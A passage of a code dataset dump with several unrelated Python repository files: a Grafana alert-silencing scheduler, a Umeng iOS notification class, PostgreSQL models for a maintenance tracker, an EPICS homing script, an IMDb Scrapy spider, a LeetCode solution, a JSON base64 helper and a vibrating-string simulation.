Network()\n\tbaseline_authors, baseline_links = graph.baseline()\n\t# plot(baseline_authors, baseline_links, graph.author_labels, args.plot_path)\n\tauthors1, links1 = graph.rl1(baseline_authors, baseline_links)\n\tauthors2, links2 = graph.rl2(baseline_authors, baseline_links)\n\tfor i in range(50):\n\t\tplot(authors1, links1, graph.author_labels, 'rl1.' + str(i))\n\t\t# plot(authors2, links2, graph.author_labels, 'rl2.' + str(i))\n","repo_name":"yangji9181/cube2net","sub_path":"plot4.py","file_name":"plot4.py","file_ext":"py","file_size_in_byte":6295,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"5917576265","text":"import yaml\nimport schedule\nimport requests\nimport time\nimport logging\n\nlogging.basicConfig(handlers=[\n    logging.FileHandler(\"log/data.log\"),\n    logging.StreamHandler()],\n    format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n    datefmt='%H:%M:%S',\n    level=logging.DEBUG)\n\nlogger = logging.getLogger(\"grafana_silence\")\n\n\ndef do_silence(alert_id, target):\n    logger.info(f\"Running silence for {alert_id}\")\n    response = requests.post(f\"{target['url']}/api/alerts/{alert_id}/pause\", headers={\n        'Authorization': f\"Bearer {target['token']}\"}, data={'paused': True})\n    logger.debug(\"Status code: %s\", response.status_code)\n    logger.debug(\"Response: %s\", response.text)\n\n\ndef do_unsilence(alert_id, target):\n    logger.info(f\"Running unsilence for {alert_id}\")\n    response = requests.post(f\"{target['url']}/api/alerts/{alert_id}/pause\", headers={\n        'Authorization': f\"Bearer {target['token']}\"}, data={'paused': False})\n    logger.debug(\"Status code: %s\", response.status_code)\n    logger.debug(\"Response: %s\", response.text)\n\n\ndef timestring_to_minutes(timestamp):\n    return int(timestamp.split(':')[0]) * 60 + int(timestamp.split(':')[1])\n\n\ndef minutes_to_timestring(minutes):\n    return f\"{str((minutes // 60) % 24).rjust(2, '0')}:{str(minutes % 60).rjust(2, '0')}\"\n\n\ndef get_silence_time(start_time, end_time):\n    start_minutes = timestring_to_minutes(start_time)\n    end_minutes = timestring_to_minutes(end_time)\n    if end_minutes < start_minutes:\n        end_minutes += 24 * 60\n    silence_times = []\n    while start_minutes < end_minutes:\n        silence_times.append(minutes_to_timestring(start_minutes))\n        start_minutes += 8 * 60\n    return silence_times\n\n\ndef init(alert_id, start_time, end_time, target):\n    
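# schedule a pause at every 8-hour mark inside the window (see get_silence_time)\n    # so the alert stays silenced, plus a single unpause job at end_time\n    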
logger.info(\n        f\"Registering alert silence for {alert_id} start at {start_time} end at {end_time}\")\n    silence_times = get_silence_time(start_time, end_time)\n    for silence_time in silence_times:\n        schedule.every().day.at(silence_time).do(lambda: do_silence(alert_id, target))\n    schedule.every().day.at(end_time).do(lambda: do_unsilence(alert_id, target))\n\n\nif __name__ == \"__main__\":\n    with open('config.yaml', 'r') as file:\n        data = yaml.safe_load(file)\n    for silence in data['silences']:\n        try:\n            target = [target for target in data['targets']\n                      if target['name'] == silence['target']][0]\n            init(silence['alert_id'], silence['start_time'],\n                 silence['end_time'], target)\n        except Exception as e:\n            logger.error(e)\n\n    while True:\n        schedule.run_pending()\n        time.sleep(1)\n","repo_name":"bahybintang/grafana-silence","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36406775929","text":"#coding=utf-8\nimport json\n# from umengnotification import UmengNotification\nfrom umessage.umengnotification import UmengNotification\n\nclass IOSNotification(UmengNotification):\n\n    APS_KEYS = [\"alert\", \"badge\", \"sound\", \"content-available\"]\n\n    def setPredefinedKeyValue(self, key, value):\n        if key in self.ROOT_KEYS:\n            self.rootJson[key] = value\n        elif key in self.APS_KEYS:\n            apsJson = json.loads('{}')\n            payloadJson = json.loads('{}')\n            if \"payload\" in self.rootJson:\n                payloadJson = self.rootJson[\"payload\"]\n            else:\n                self.rootJson[\"payload\"] = payloadJson\n            if \"aps\" in payloadJson:\n                apsJson = payloadJson[\"aps\"]\n            else:\n                payloadJson[\"aps\"] = apsJson\n            apsJson[key] = value\n        elif key in self.POLICY_KEYS:\n            policyJson = json.loads('{}')\n            if \"policy\" in self.rootJson:\n                policyJson = self.rootJson[\"policy\"]\n            else:\n                self.rootJson[\"policy\"] = policyJson\n            policyJson[key] = value\n        else:\n            if key in [\"payload\",\"aps\",\"policy\"]:\n                print(\"You don't need to set value for %s, just set values for the sub keys in it.\" % key)\n            else:\n                print(\"Unknown key: %s\" % key)\n\n    def setAlert(self, alert):\n        self.setPredefinedKeyValue(\"alert\", alert)\n\n    def setBadge(self, badge):\n        self.setPredefinedKeyValue(\"badge\", badge)\n\n    def setSound(self, sound):\n        self.setPredefinedKeyValue(\"sound\", sound)\n\n    def setContentAvailable(self, contentAvailable):\n        self.setPredefinedKeyValue(\"content-available\", contentAvailable)\n\n    def setCustomizedField(self, key, value):\n        payloadJson = json.loads('{}')\n        if \"payload\" in self.rootJson:\n            payloadJson = self.rootJson[\"payload\"]\n        else:\n            self.rootJson[\"payload\"] = payloadJson\n        payloadJson[key] = value","repo_name":"OPN48/umeng_push","sub_path":"src/umessage/iosnotification.py","file_name":"iosnotification.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"2771685917","text":"\"\"\"Creates the database models with ability to perform SQL functions\"\"\"\nfrom passlib.handlers.bcrypt import bcrypt\n\nimport v1.models\nfrom datetime import datetime\nfrom run import db\n\n\nclass DBBaseModel(v1.models.BaseModel):\n    \"\"\"\n    Base Database models for transactions\n    \"\"\"\n    __table__ = \"\"\n\n    def __init__(self, created_at, updated_at):\n        super().__init__(created_at, updated_at)\n\n    @classmethod\n    def migrate(cls):\n        \"\"\"\n        Create the tables here\n        :return:\n        \"\"\"\n        pass\n\n    @classmethod\n    def 
rollback(cls):\n        \"\"\"\n        Deletes all the data from the tables\n        :param cls:\n        :return:\n        \"\"\"\n        db.cursor.execute(\"DELETE FROM {}\".format(cls.__table__))\n\n        db.connection.commit()\n\n    @classmethod\n    def deserialize(cls, dictionary):\n        \"\"\" Create a model object from the dictionary,\n        Override this method to do the conversion custom\n        \"\"\"\n        return cls(datetime.now(), datetime.now())\n\n    @classmethod\n    def query_all(cls):\n        \"\"\"\n        Query all items from the database\n        :return:\n        \"\"\"\n        db.cursor.execute(\"SELECT * FROM {}\".format(cls.__table__))\n        items = db.cursor.fetchall()\n        return [cls.deserialize(x) for x in items]\n\n    @classmethod\n    def query_one_by_field(cls, field, value):\n        \"\"\"Get one item from the database\"\"\"\n        items = cls.query_by_field(field, value)\n        if len(items) == 0:\n            return None\n        return items[0]\n\n    @classmethod\n    def query_by_field(cls, field, value):\n        \"\"\"\n        Query items from the database based on a particular field\n        :param field:\n        :param value:\n        :return:\n        \"\"\"\n        db.cursor.execute(\"SELECT * FROM {0} WHERE {1} = %s\".format(cls.__table__, field), (value,))\n        items = db.cursor.fetchall()\n\n        return [cls.deserialize(x) for x in items]\n\n    @classmethod\n    def query_by_id(cls, _id):\n        \"\"\"\n        Query items from the database by id\n        :param _id:\n        :return:\n        \"\"\"\n        db.cursor.execute(\"SELECT * FROM {} WHERE id = %s\".format(cls.__table__), (_id,))\n        item = db.cursor.fetchone()\n        if item is None:\n            return None\n        return cls.deserialize(item)\n\n    def save(self):\n        \"\"\" Save an item to the database\"\"\"\n        result = db.cursor.fetchone()\n        if result is not None:\n            self.id = result['id']\n        db.connection.commit()\n\n    def update(self):\n        \"\"\"\n        Updates the details of an item\n        :return:\n        \"\"\"\n        self.updated_at = datetime.now()\n        pass\n\n    def delete(self):\n        \"\"\"\n        Deletes an item from the database\n        :return:\n        \"\"\"\n        db.cursor.execute(\"DELETE FROM {} WHERE id = %s\".format(self.__table__), (self.id,))\n        db.connection.commit()\n\n\nclass User(v1.models.User, DBBaseModel):\n    \"\"\"\n    Creates a user with different roles\n    \"\"\"\n    __table__ = \"users\"\n\n    @classmethod\n    def migrate(cls):\n        db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS users(\n        id serial PRIMARY KEY ,\n        firstname varchar,\n        lastname varchar,\n        username varchar,\n        email varchar,\n        password varchar,\n        created_at timestamp,\n        updated_at timestamp,\n        role varchar)\"\"\")\n        db.connection.commit()\n\n    @classmethod\n    def deserialize(cls, dictionary):\n        user = User()\n        user.id = dictionary['id']\n        user.firstname = dictionary['firstname']\n        user.lastname = dictionary['lastname']\n        user.username = dictionary['username']\n        user.email = dictionary['email']\n        user.password = dictionary['password']\n        user.created_at = dictionary['created_at']\n        user.updated_at = dictionary['updated_at']\n        user.role = dictionary['role']\n\n        return user\n\n    @staticmethod\n    def get_by_username(username):\n        \"\"\"\n        Get user based on the username\n        :param username:\n        :return:\n        \"\"\"\n        return User.query_by_field(\"username\", username)\n\n    def save(self):\n        \"\"\"\n        Save the user into the database\n        :return:\n        \"\"\"\n        db.cursor.execute(\n            \"INSERT INTO users(firstname,lastname,username,email,\"\n            \"password,created_at,updated_at, role) VALUES(%s,%s,%s,%s,%s,%s,%s, %s) RETURNING id\", (\n                self.firstname, self.lastname, self.username, self.email,\n                self.password, self.created_at,\n                self.updated_at, self.role\n            ))\n        super().save()\n\n    def update(self):\n        \"\"\"\n        Update the details of the user\n        :return:\n        \"\"\"\n        
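# the base-class update() only refreshes updated_at; the SQL UPDATE runs here\n        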
super().update()\n        db.cursor.execute(\n            \"UPDATE users SET firstname = %s, lastname = %s, username = %s,\"\n            \"email = %s, password = %s, updated_at = now(), role = %s where id = %s\", (\n                self.firstname, self.lastname, self.username,\n                self.email, self.password, self.role,\n                self.id))\n        db.connection.commit()\n\n    def requests(self):\n        \"\"\"\n        Get all the requests for this user\n        :return:\n        \"\"\"\n        return Request.query_by_field(\"created_by\", self.id)\n\n    def is_admin(self):\n        \"\"\"\n        To check whether a user is an administrator\n        :return:\n        \"\"\"\n        return self.role == User.ROLE_ADMINISTRATOR\n\n    def notifications(self):\n        \"\"\"\n        Get all the notifications sent to this user\n        :return:\n        \"\"\"\n\n        return Notification.query_by_field(\"user_id\", self.id)\n\n\nclass Admin(User):\n    \"\"\"\n    Contains implementation for creating a default admin from the super class\n    \"\"\"\n\n    def __init__(self, firstname=\"\", lastname=\"\", email=\"\", username=\"\", password=\"\", profile_picture=\"\",\n                 created_at=None, updated_at=None):\n        super().__init__(firstname, lastname, email, username, password, profile_picture,\n                         created_at or datetime.now(), updated_at or datetime.now())\n        self.role = User.ROLE_ADMINISTRATOR\n\n    @staticmethod\n    def default():\n        admin = Admin()\n        admin.firstname = db.app.config['DEFAULT_ADMIN_FIRST_NAME']\n        admin.lastname = db.app.config['DEFAULT_ADMIN_LAST_NAME']\n        admin.email = db.app.config['DEFAULT_ADMIN_EMAIL']\n        admin.username = db.app.config['DEFAULT_ADMIN_USER_NAME']\n        admin.password = bcrypt.encrypt(db.app.config['DEFAULT_ADMIN_PASSWORD'])\n        admin.profile_picture = db.app.config['DEFAULT_ADMIN_PROFILE_PICTURE']\n\n        return admin\n\n\nclass Request(v1.models.Request, DBBaseModel):\n    \"\"\"\n    Contains the maintenance/repair request\n    \"\"\"\n    __table__ = \"requests\"\n\n    @classmethod\n    def migrate(cls):\n        db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS requests(\n        id serial PRIMARY KEY ,\n        product_name varchar,\n        description varchar,\n        status varchar,\n        photo varchar,\n        created_by INTEGER,\n        created_at TIMESTAMP,\n        updated_at TIMESTAMP,\n        FOREIGN KEY (created_by) REFERENCES users(id) ON DELETE CASCADE)\"\"\")\n        db.connection.commit()\n\n    @classmethod\n    def deserialize(cls, dictionary):\n        request = Request()\n        request.id = dictionary['id']\n        request.product_name = dictionary['product_name']\n        request.description = dictionary['description']\n        request.status = dictionary['status']\n        request.photo = dictionary['photo']\n        request.created_by = dictionary['created_by']\n        request.created_at = dictionary['created_at']\n        request.updated_at = dictionary['updated_at']\n\n        return request\n\n    def save(self):\n        \"\"\"\n        Save the request into the database\n        :return:\n        \"\"\"\n        db.cursor.execute(\n            \"INSERT INTO requests(product_name,description,status,photo,created_by,created_at,updated_at)\"\n            \" VALUES(%s,%s,%s,%s,%s,%s,%s) RETURNING id\", (\n                self.product_name,\n                self.description,\n                self.status,\n                self.photo,\n                self.created_by,\n                self.created_at,\n                self.updated_at\n            ))\n        super().save()\n\n    def update(self):\n        super().update()\n        db.cursor.execute(\n            \"UPDATE requests SET product_name = %s, description = %s, \"\n            \"status = %s, photo = %s, updated_at = now() WHERE id = %s\", (\n                self.product_name,\n                self.description,\n                self.status,\n                self.photo,\n                self.id\n            )\n        )\n        db.connection.commit()\n\n    def approve(self):\n        \"\"\"\n        Mark a request as approved\n        :return:\n        \"\"\"\n        self.status = Request.STATUS_APPROVED\n        self.update()\n\n    def disapprove(self):\n        \"\"\"\n        Mark a request as disapproved\n        
:return:\n        \"\"\"\n        self.status = Request.STATUS_DISAPPROVED\n        self.update()\n\n    def resolve(self):\n        \"\"\"\n        Mark a request as resolved\n        :return:\n        \"\"\"\n        self.status = Request.STATUS_RESOLVED\n        self.update()\n\n    def feedback(self):\n        \"\"\"\n        Gets the feedback associated with this request\n        :return:\n        \"\"\"\n        return Feedback.query_by_field(\"request\", self.id)\n\n    @classmethod\n    def query_for_user(cls, user_id):\n        \"\"\"\n        Gets all the requests for this user\n        :param user_id:\n        :return:\n        \"\"\"\n        return Request.query_by_field(\"created_by\", user_id)\n\n\nclass Feedback(v1.models.Feedback, DBBaseModel):\n    \"\"\"\n    Stores the feedback to the requests\n    \"\"\"\n    __table__ = \"feedback\"\n\n    @classmethod\n    def migrate(cls):\n        \"\"\"\n        Creates the feedback table\n        :return:\n        \"\"\"\n        db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS feedback(\n        id serial PRIMARY KEY ,\n        admin INTEGER,\n        request INTEGER,\n        message varchar,\n        created_at timestamp,\n        updated_at TIMESTAMP,\n        foreign key (admin) references users(id) ON DELETE CASCADE,\n        foreign key (request) references requests(id) ON DELETE CASCADE\n        )\"\"\")\n        db.connection.commit()\n\n    @classmethod\n    def deserialize(cls, dictionary):\n        feedback = Feedback()\n        feedback.id = dictionary['id']\n        feedback.admin = dictionary['admin']\n        feedback.request = dictionary['request']\n        feedback.message = dictionary['message']\n        feedback.created_at = dictionary['created_at']\n        feedback.updated_at = dictionary['updated_at']\n\n        return feedback\n\n    def save(self):\n        \"\"\"\n        Saves a feedback to the feedback table\n        :return:\n        \"\"\"\n        db.cursor.execute(\"INSERT INTO feedback(admin, request, message, created_at, updated_at) \"\n                          \"VALUES(%s,%s,%s,%s,%s) RETURNING id\", (\n                              self.admin,\n                              self.request,\n                              self.message,\n                              self.created_at,\n                              self.updated_at\n                          ))\n\n        super().save()\n\n    def update(self):\n        super().update()\n        db.cursor.execute(\n            \"UPDATE feedback SET admin = %s, request = %s, message = %s, updated_at = now() WHERE id = %s\",\n            (\n                self.admin,\n                self.request,\n                self.message,\n                self.id\n            ))\n        db.connection.commit()\n\n    def maintenance_request(self):\n        \"\"\"\n        Returns the request for this Feedback\n        :return:\n        \"\"\"\n        return Request.query_by_id(self.request)\n\n\nclass Notification(v1.models.Notification, DBBaseModel):\n    \"\"\"\n    Stores the unread and the read notifications for the user\n    \"\"\"\n    __table__ = \"notifications\"\n\n    @classmethod\n    def migrate(cls):\n        \"\"\"\n        Create the Notifications Table\n        :return:\n        \"\"\"\n        db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS notifications(\n        id serial PRIMARY KEY ,\n        admin_id INTEGER,\n        user_id INTEGER,\n        message varchar,\n        read boolean,\n        created_at timestamp,\n        updated_at timestamp,\n        FOREIGN KEY (admin_id) references users(id),\n        FOREIGN KEY (user_id) references users(id) ON DELETE CASCADE\n        )\"\"\")\n        db.connection.commit()\n\n    @classmethod\n    def deserialize(cls, dictionary):\n        notification = Notification()\n        notification.id = dictionary['id']\n        notification.admin = dictionary['admin_id']\n        notification.user = dictionary['user_id']\n        notification.message = dictionary['message']\n        notification.read = dictionary['read']\n        notification.updated_at = dictionary['updated_at']\n        notification.created_at = dictionary['created_at']\n\n        return notification\n\n    def save(self):\n        \"\"\"\n        Save the notification into the database\n        :return:\n        \"\"\"\n        db.cursor.execute(\n            \"INSERT INTO notifications(admin_id,user_id,message,read, created_at, updated_at) \"\n            \"VALUES(%s,%s,%s,%s,%s,%s) RETURNING id;\",\n            (\n                self.admin,\n                
self.user,\n                self.message,\n                False,\n                self.created_at,\n                self.updated_at\n            ))\n        super().save()\n\n    def update(self):\n        \"\"\"\n        Update the notification in the database\n        :return:\n        \"\"\"\n        super().update()\n        db.cursor.execute(\"UPDATE notifications SET message = %s, read = %s, updated_at = now() WHERE id = %s\", (\n            self.message,\n            self.read,\n            self.id\n        ))\n        db.connection.commit()\n\n    def mark_as_read(self):\n        \"\"\"\n        Mark a notification as read\n        :return:\n        \"\"\"\n        self.read = True\n        self.update()\n\n    def get_admin(self):\n        \"\"\"\n        Get the Admin that created this notification\n        :return:\n        \"\"\"\n        return User.query_by_id(self.admin)\n\n    def get_user(self):\n        \"\"\"\n        Get the User that received this notification\n        :return:\n        \"\"\"\n        return User.query_by_id(self.user)\n\n    @classmethod\n    def query_all_for_user(cls, user_id):\n        \"\"\"\n        Returns all the notifications sent to a user\n        :param user_id:\n        :return:\n        \"\"\"\n        return Notification.query_by_field(\"user_id\", user_id)\n\n\nclass Blacklist(DBBaseModel):\n    \"\"\"\n    Contains the list of blacklisted tokens when a user logs out\n    \"\"\"\n    __table__ = \"blacklist\"\n\n    def __init__(self, token):\n        super().__init__(datetime.now(), datetime.now())\n        self.token = token\n\n    @classmethod\n    def deserialize(cls, dictionary):\n        blacklist = Blacklist(dictionary['token'])\n        blacklist.id = dictionary['id']\n\n        return blacklist\n\n    @classmethod\n    def migrate(cls):\n        \"\"\"\n        Create the table to store the blacklisted tokens\n        :return:\n        \"\"\"\n        db.cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS blacklist(\n        id serial PRIMARY KEY ,\n        token varchar)\"\"\")\n        db.connection.commit()\n\n    def save(self):\n        \"\"\"\n        Saves a token into the database\n        :return:\n        \"\"\"\n\n        db.cursor.execute(\"INSERT INTO blacklist(token) VALUES(%s)\", (self.token,))\n        db.connection.commit()\n","repo_name":"gitaumoses4/maintenance-tracker","sub_path":"API/v2/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15533,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"3202518828","text":"#!/usr/bin/env python\n# Go to Fwd limit and then go back one mm and then again into the switch\n\nimport epics\nimport os\nimport sys\nimport time\nimport math\nimport unittest\nimport ecmcSlitDemoLib\n\ntestLoops = 10\ntimeout = 50\nif len(sys.argv)!=6:\n    print(\"python ecmcTestHome.py. 
\")\n print(\"python ecmcTestHome.py IOC:Axis1 IOC:TestNumber 1 10\")\n sys.exit()\n\n\nmotorPvName = sys.argv[1]\ntestPvname = sys.argv[2]\nnCmdData = float(sys.argv[3]) \ntestNumber = float(sys.argv[4]) \ntestPv = epics.PV(testPvname)\n\nif testPv is None:\n print (\"Invalid testPv\") \n sys.exit()\n\n#Start homing sequences\necmcSlitDemoLib.setAxisEnable(motorPvName, 1)\ntime.sleep(1) \necmcSlitDemoLib.triggHomeAxis(motorPvName,nCmdData)\ntime.sleep(1) \necmcSlitDemoLib.setAxisEnable(motorPvName, 0)\ntestPv.put(testNumber)\n\nprint ('Homing done')\n\n# Runing homing\n","repo_name":"anderssandstrom/ecmccomgui","sub_path":"tools/ecmcTestHome.py","file_name":"ecmcTestHome.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25468499044","text":"import scrapy\nfrom moviescrawl.items import MoviescrawlItem\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass MoviesSpider(scrapy.Spider):\n name = \"imdbcrawl\"\n start_urls = [\n 'https://www.imdb.com/search/title/?groups=top_1000&sort=user_rating',\n ]\n\n def parse_movie(self,response):\n mydict = response.meta['data']\n mydict['release_date'] = response.xpath('//div[@class=\"subtext\"]/a[@title=\"See more release dates\"]/text()').extract_first()\n mydict['release_date'] = self.clean_data(mydict['release_date'])\n mydict['country']= response.xpath('//h4[text()=\"Country:\"]/following-sibling::a/text()').extract()\n mydict['language'] = response.xpath('//h4[text()=\"Language:\"]/following-sibling::a/text()').extract()\n mydict['year'] = response.xpath('.//span[@id=\"titleYear\"]/a/text()').extract_first()\n # mydict['synopsis'] = response.xpath('.//div[@class=\"summary_text\"]/text()').extract_first()\n mydict['synopsis'] = response.xpath('.//div[@class=\"summary_text\"]//text()').extract()\n mydict['storyline'] = response.xpath('.//div[@class=\"inline canwrap\"]/p/span/text()').extract_first()\n mydict['storyline'] = self.clean_data(mydict['storyline'])\n mydict['synopsis'] = self.parse_synopsis(mydict['synopsis'])\n # print(\"synopsis\",mydict['synopsis'])\n self.list_repr(mydict,['country','language','directors','actors'])\n movieItem = MoviescrawlItem(**mydict)\n # yield mydict\n # logger.debug(\"I am here\")\n yield movieItem\n\n def clean_data(self,str1):\n if str1 is not None:\n str1 = str1.replace(\"\\n\",\"\").strip()\n str1 = str1.replace('\"',\"\")\n return str1\n \n def parse_synopsis(self,list1):\n if list1 is not None:\n str1 = \"\".join(list1)\n str1 = str1.replace(\"\\n\",\"\").strip()\n str1 = str1.replace('\"',\"\")\n return str1\n return None\n\n def list_repr(self,mydict,keys):\n for key in keys:\n if mydict[key] is not None:\n mydict[key] = \", \".join(mydict[key])\n \n\n def clean_runtime(self,str1):\n if str1 is not None:\n int1 = int(str1.split(\" \")[0])\n return int1\n return 0\n def parse(self, response):\n movies = response.xpath('//div[@class=\"lister-item-content\"]')\n for movie in movies:\n mydict = {\n 'ranking': movie.xpath('.//span[@class=\"lister-item-index unbold text-primary\"]/text()').extract_first(),\n 'movie': movie.xpath('.//h3[@class=\"lister-item-header\"]/a/text()').extract_first(),\n 'rating': movie.xpath('.//div[@class=\"inline-block ratings-imdb-rating\"]/@data-value').extract_first(),\n 'metascore': movie.xpath('.//div[@class=\"inline-block ratings-metascore\"]/span/text()').extract_first(),\n 'certification': movie.xpath('.//p[@class=\"text-muted 
\"]/span[@class=\"certificate\"]/text()').extract_first(),\n 'runtime': movie.xpath('.//span[@class=\"runtime\"]/text()').extract_first(),\n 'genre': movie.xpath('.//span[@class=\"genre\"]/text()').extract_first(),\n 'directors': movie.xpath('p[3]/span/preceding-sibling::a/text()').extract(),\n 'actors': movie.xpath('p[3]/span/following-sibling::a/text()').extract(),\n 'votes': movie.xpath('.//p[@class=\"sort-num_votes-visible\"]/span[@name=\"nv\"][1]/@data-value').extract_first(),\n }\n mydict['ranking'] = mydict['ranking'].replace(\",\",\"\")\n mydict['genre'] = self.clean_data(mydict['genre'])\n mydict['runtime'] = self.clean_runtime(mydict['runtime'])\n movie_url = movie.xpath('.//h3[@class=\"lister-item-header\"]/a/@href').extract_first()\n movie_url = response.urljoin(movie_url)\n yield scrapy.Request(movie_url, self.parse_movie, meta = {'data': mydict})\n\n relative_url = movies.xpath('//a[@class=\"lister-page-next next-page\"]/@href').extract_first()\n relative_url = response.urljoin(relative_url)\n print(\"next_page\",relative_url) \n yield scrapy.Request(relative_url, callback=self.parse)\n","repo_name":"AbidHasan95/moviehunt","sub_path":"moviescrawl/spiders/movies_spider.py","file_name":"movies_spider.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72623503845","text":"from collections import Counter\n\n\nclass Solution:\n def maxScore(self, s: str) -> int:\n score = 0\n for i in range(1, len(s)):\n score = max(\n score, \n Counter(s[:i])[\"0\"] + Counter(s[i:])[\"1\"]\n )\n return score","repo_name":"josharnoldjosh/LeetCodeSolutions","sub_path":"maximum-score-after-splitting-a-string/maximum-score-after-splitting-a-string.py","file_name":"maximum-score-after-splitting-a-string.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2696699474","text":"import base64\n\nPAYLOAD = {\n \"num\": 12345,\n \"bool\": True,\n \"name\": \"myx\",\n \"age\": \"100\",\n \"list_str\": [\"ss\", \"ss\"],\n \"list_obj\": [\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n }\n ],\n \"obj\": {\n \"num\": 12345,\n \"bool\": True,\n \"name\": \"myx\",\n \"obj\": {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n },\n \"list_obj\": [\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n },\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n },\n {\n \"attr1\": \"a\",\n \"attr2\": \"b\"\n }\n ],\n }\n}\n\n\ndef encrypt_json(json: dict, modifier) -> dict:\n result: dict = {}\n\n for k, v in list(json.items()):\n if type(v) is dict:\n result[k] = encrypt_json(v, modifier)\n elif type(v) is list:\n result[k] = [(modifier(i) if type(i) is not dict else encrypt_json(i, modifier)) for i in v]\n else:\n result[k] = modifier(v)\n return result\n\n\nif __name__ == '__main__':\n def modifier(s): return base64.b64encode(str(s).encode())\n\n # print(encrypt_json(PAYLOAD, lambda s: base64.b64encode(str(s).encode())))\n print(encrypt_json(PAYLOAD, modifier))\n","repo_name":"myx-oneoonine/python-playground","sub_path":"encrypt_json.py","file_name":"encrypt_json.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18705499931","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 30 22:07:35 2018\n\n@author: Matt\n\"\"\"\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as 
animation\n\n#%matplotlib qt\n\n#constants\nL=1\nd=0.1\nC=1\nsig=0.3\nh=10**-6\nn=200\nv=100\nnl=400\nnts = 30000\ntf = h*nts\n#define psi for initial conditions\ndef psi(x):\n    a = C*x*(L-x)/L**2\n    b = np.exp(-((x-d)**2)/(2*sig**2))\n    return a*b\n#matrices for time progression\nps = np.zeros([n,nts])\nph = np.zeros([n,nts])\nl = np.linspace(0,L,n)#positions along the string\nfor i in range(0,n):\n    ps[i,0] = psi(l[i])#initial velocities\nfor T in range(0,nts-1):#integration loop\n    for i in range(0,n):\n        ph[i][T+1] = ph[i][T]+h*ps[i][T]#update positions\n    for i in range(1,n-1):#hold edgepoints constant for velocities\n        ps[i][T+1] = ps[i][T]+h*(v**2/(l[1]**2))*(ph[i+1][T]+ph[i-1][T]-2*ph[i][T])    \n    if T%1000 == 0:\n        print(T/nts*100,\"%\")#counter to see progression\n#lowlim = min(min(j) for j in ph)\n#uplim = max(max(j) for j in ph)\nlowlim = -0.001#define limits\nuplim = 0.001#define limits\n# =============================================================================\n# fig, ax = plt.figure(), plt.axes(xlim=(0,1),ylim=(lowlim,uplim))\n# x = l\n# line, = ax.plot(x,ph[:,i])\n# def init():  # only required for blitting to give a clean slate.\n#     line.set_ydata([np.nan] * len(x))\n#     return line,\n# \n# \n# def animate(i):\n#     line.set_ydata(ph[:,i])  # update the data.\n#     return line,\n# \n# \n# ani = animation.FuncAnimation(\n#     fig, animate, init_func=init, interval=20, blit=False, frames = len(ph[3,:]))\n# #ani.save(\"movie.mp4\")\n# \n# plt.show()\n# =============================================================================\n# =============================================================================\n# xdata, ydata = [], []\n# fig, ax = plt.figure(), plt.axes(xlim=(0,1),ylim=(lowlim,uplim))\n# line, = ax.plot([], [], lw=2)\n# def init():\n#     line.set_data([], [])\n#     return line,\n# def animate(i):\n#     x = l\n#     y = ph[:,i]\n#     line.set_data(x, y)\n#     return line,\n# \n# anim = FuncAnimation(fig, animate, frames=np.linspace(0, tf, nts/100),\n#                               init_func=init, blit=True)\n# anim.save('basic_animation.mp4',writer='ffmpeg',fps=50,dpi=600)\n# =============================================================================\n#make sure backend graphics are set to automatic\nplt.ion()\n#initial plot set up\nfig = plt.figure()\nax = fig.add_subplot(111)\nline1, = ax.plot(l, ph[:,0], 'r-')#,xlim=[0,1],ylim=[lowlim,uplim])    \nax.set_xlim([0,1])\nax.set_ylim([lowlim,uplim])\n\nfor i in range(0,nts):\n    if i%10==0:#skip some steps to make it go faster.\n        #ax.xlim([0,1])\n        #update plots as time progresses\n        ax.set_ylim([lowlim,uplim])\n        line1.set_ydata(ph[:,i])\n        fig.canvas.draw()\n        fig.canvas.flush_events()\nplt.show()\n\nplt.subplot(221)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,3000])\nplt.xlabel('position')\nplt.ylabel('displacement')\nplt.title('time = %f'%(h*3000))\n\nplt.subplot(222)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,15000])\nplt.xlabel('position')\nplt.ylabel('displacement')\nplt.title('time = %f'%(h*15000))\n\nplt.subplot(223)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,23800])\nplt.xlabel('position')\nplt.ylabel('displacement')\nplt.title('time = %f'%(h*23800))\n\nplt.subplot(224)\nplt.ylim([lowlim,uplim])\nplt.plot(l,ph[:,28500])\nplt.xlabel('position')\nplt.ylabel('displacement')\nplt.title('time = %f'%(h*28500))\nplt.tight_layout()\nplt.savefig('destabilization.png')\n","repo_name":"matthew-rozak/MROZAK-PHY407","sub_path":"Lab 
